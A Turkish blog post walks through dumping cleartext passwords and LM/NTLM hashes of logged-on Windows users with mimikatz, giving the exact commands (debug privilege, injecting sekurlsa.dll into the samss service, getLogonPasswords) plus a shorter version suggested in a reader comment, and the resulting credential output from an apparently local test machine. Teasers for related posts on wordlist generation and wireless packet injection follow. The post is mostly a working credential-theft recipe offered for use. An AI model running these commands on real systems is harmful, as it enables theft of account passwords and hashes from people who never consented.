Ana içeriğe atla

Mimikatz ile Aktif Kullanıcı Parolalarını Almak

Hedef sistem üzerinde aktif olarak oturum açmış kullanıcı hesaplarına ait parolalar mimikatz aracı ile salt metin (clear text) olarak alınabiliyor.

Bunun için yapılması gereken mimikatz aracının hedef sisteme yüklemek, çalıştırmak ve ardından sekurlsa.dll dosyasını enjekte ederek, @getLogonPasswords komutu ile aktif oturumların parolalarını almak...

C:\mimi>mimikatz
mimikatz 1.0 x86 (RC)    /* Traitement du Kiwi (Oct 13 2012 13:47:20) */
// http://blog.gentilkiwi.com/mimikatz
...
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
...
mimikatz # inject::service samss sekurlsa.dll
...
mimikatz # @getLogonPasswords full 
Bu komutun ardından aktif olarak oturum açmış bulunan kullanıcı hesaplarına ait açık haldeki parolalar ve hash bilgileri aşağıdaki gibi listelenecektir. Aşağıda kırmızı ile işaretlediğim "Mot de passe:" başlıkları altında kullanıcı parolalarının listelendiğini görebilirsiniz...

Authentification Id         : 0;242741
Package d'authentification  : NTLM
Utilisateur principal       : oem
Domaine d'authentification  : oem-Bilgisayar
    msv1_0 :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Hash LM      : b42c04ccf43253bbaad3b435b51404ee
     * Hash NTLM    : ebe666e1cfd412358a0977fef42c76dd
    wdigest :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat
    tspkg :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat
    kerberos :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat


Authentification Id         : 0;137629
Package d'authentification  : NTLM
Utilisateur principal       : user
Domaine d'authentification  : oem-Bilgisayar
 msv1_0 :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Hash LM      : 2b3137035a2b985b08bd455a508ea203
  * Hash NTLM    : d4605c09dbb7d109ff993066671b72ac
 wdigest :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6
 tspkg :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6
 kerberos :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6

Gentil Kiwi tarafından yapılan yorumdan sonra gelen düzenleme:
Aktif parola listesini almak için aşağıdaki komutları vermek yeterli olacakmış. İşleri bu kadar uzatmaya gerek yokmuş...

C:\mimi>mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full


Yorumlar

  1. Does not need injection anymore :
    privilege::debug
    sekurlsa::logonPasswords full

    ;)

    YanıtlaSil
  2. @Gentil Kiwi, Thanks a lot :)

    YanıtlaSil

Yorum Gönder

Bu blogdaki popüler yayınlar

Crunch ile Wordlist Oluşturmak

Crunch seçilen karakter kümesinden, istenilen uzunlukta parolalar üreten ve bu parolaları bir dosyaya yazarak wordlist oluşturan kullanışlı bir araçtır. Çalışmak için özel bir yetkiye ihtiyaç duymaz. Yalnızca derlenip çalıştırılması yeterlidir. Çalıştığında istenilen karakter kümesinden parolalar üretir ve bir dosyaya yazar.
Oldukça hızlı çalışır ve kolay kullanılır.



Crunch Kurulumu
Öncelikle crunch yazılımını indirelim.
harun@gondor:~$ wget http://garr.dl.sourceforge.net/project/crunch-wordlist/crunch-wordlist/crunch-3.0.1.tgz
İndirme işlemi bittikten sonra crunch-3.0.1.tgz arşivini açalım.

harun@gondor:~$ tar zxvf crunch-3.0.1.tgz crunch3.0/ crunch3.0/Makefile crunch3.0/GPL.TXT crunch3.0/crunch.1 crunch3.0/charset.lst crunch3.0/crunch.cArşivin açılmasıyla oluşan crunch3.0/ dizinine geçelim ve ardından make komutunu vererek derleme işlemini başlatalım.
harun@gondor:~$ cd crunch3.0/ harun@gondor:~/crunch3.0$ make Building binary... /usr/bin/gcc -Wall -lm -pthread -std=c99 -m32 -D_LARGEF…

Captive Portal Ek Özellikler

PfSense üzerinde gelen Captive Portal özelliği hot spot çözümü olarak kullanılabilecek güzel bir özelliktir. Captive Portal, kablosuz ağınıza dahil olan kullanıcıların tüm internet erişimlerini engeller ve web sayfalarına erişmek isteyen kullanıcılara bir karşılama ekranı getirerek oturum açmalarını ister.

İnternete erişmek isteyen kullanıcı, kendisine ait kullanıcı adı ve parolası ile oturum açarak internet erişimi sağlayabilir. Bu nedenler kafeler, oteller ve benzeri yerler ile misafirlerini kendi yerel ağlarına bağlamak istemeyen şirketler için oldukça güzel bir çözümdür. Ancak hali hazırda var olan özellikleriyle Captive Portal yeterince kullanışlı değildir.

Bu nedenle  PfSense üzerinde bir şeyler yazmam ve sistemi modifiye etmem gerekmişti. Bu çalışma sırasında aşağıdaki özellikler sisteme eklemiştim...
Captive Portal da kullanıcı hesapları açabilen ancak sistemin geri kalan ayarlarına ulaşamayan bir sınırlı kullanıcı hesabı.Saat sınırlamalı kullanıcı hesabı açılabil…

Ubuntu, Aireplay-ng, Atheros AR9285, mon0 Channel -1 Problemi

Bir süre önce kullandığım Intel 4965 kablosuz ağ kartı ile "Channel -1" sorunu yaşadığımı ve bu sorunu çözmek için neler yaptığımı yazmıştım. Aireplay-ng ile paket sokuşturma yapmaya çalıştığımda aireplay-ng aşağıdaki hatayı veriyor ve çalışmıyordu.

21:09:28  mon0 is on channel -1, but the AP uses channel 1
Daha sonra emektar dizüstü bilgisayarımın ekran sorunları nedeniyle yeni bir makine almak zorunda kaldım. Tabii doğal olarak yeni makine (Asus N53SN) yeni bir kablosuz ağ arabirimi (Atheros 9285) demekti.

root@gondor:~# lspci | grep Wireless 03:00.0 Network controller: Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

Aynı sorunu bu kez "AR9285 Atheros wireless network adapter" için çözmek zorunda kaldım. Aynı şeyleri Intel 4965 için daha önce de yazdığımdan, bu kez yapılacakları kısaca özetliyorum.

İlk olarak yeni sürücümüzü indirilerim wireless.kernel.org adresinden indirelim ardından da gerekli yamaları indirip sürücü kayna…